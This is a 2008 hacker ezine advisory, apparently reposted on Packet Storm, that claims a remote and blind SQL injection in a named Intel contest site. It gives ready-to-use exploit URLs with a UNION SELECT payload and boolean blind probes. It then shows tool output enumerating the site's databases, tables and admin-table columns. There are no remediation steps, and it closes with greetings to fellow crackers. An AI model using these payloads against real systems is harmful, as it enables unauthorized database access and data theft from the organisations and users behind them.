Intel.com suffers from a remote SQL injection vulnerability.
5fe6fb8f53b3a500f328d30f0d29c1039531799019f9b396af59755870013ac7┌┌───────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘ [ EZINE ] ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr : : :
│ Website : intel.com │ │ Famous Sites Can Be │
│ Vuln Type: Remote + Blind SQL INJ │ │ │
│ Method : GET │ │ Olso Vulned │
│ Critical : High [░░▒▒▓▓██] │ │ │
│ Impact : Database access │ │ │
│ ────────────────────────────────────┘ └─────────────────────────────────── │
│ DALnet #crackers ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘ Exploit URL's ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
[+] Remote SQL
http://softwarecontests.intel.com/gamedemo/entrydetail.php?entryid=-1 UNION SELECT 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--
[+] Blind SQL
http://softwarecontests.intel.com/gamedemo/entrydetail.php?entryid=1 and 1=1
http://softwarecontests.intel.com/gamedemo/entrydetail.php?entryid=1 and 1=0
[+] Text Change
Project/Company URL
[+] Attack Results
[+] URL:http://softwarecontests.intel.com/gamedemo/entrydetail.php?entryid=1
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing all databases current user has access too!
[+] 02:05:19
[+] Number of Rows: 3
[0]: contests
[1]: contestsapac
[2]: gamecontest
[+] Showing Tables from database "contests"
[0]: cp_article
[1]: cp_category
[2]: cp_comment
[3]: cp_content
[4]: cp_contest
[5]: cp_country
[6]: cp_email
[7]: cp_entry
[8]: cp_entrytext
[9]: cp_previewimages
[10]: cp_regtext
[11]: cp_rhclinks
[12]: cp_rhctext
[13]: cp_spotlight
[14]: cp_state
[15]: gd_category
[16]: gd_comments
[17]: gd_content
[18]: gd_country
[19]: gd_entry
[20]: gd_entrytext
[21]: gd_regtext
[22]: gd_rhclinks
[23]: gd_rhctext
[24]: gd_spotlight
[25]: gd_state
[26]: gd_votecount
[27]: tc_admin
[28]: tc_common_avatar
[29]: tc_common_user
[30]: tc_entry
[31]: tc_entryattachment
[32]: tc_points
[33]: tc_pointsmeta
[34]: tc_problemattachment
[35]: tc_problemset
[36]: tc_status
[+] Showing Columns from database "contests" and Table "tc_admin"
[0]: id
[1]: homepagetext
[2]: registerpagetext
[3]: alluserstext
[4]: spotlight1
[5]: spotlight2
[6]: spotlight3
[-] 19:38:33
[-] Total URL Requests 578
[-] Done
└────────────────────────────────────────────────────────────────────────────┘
Greets:
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .
┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2008 ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed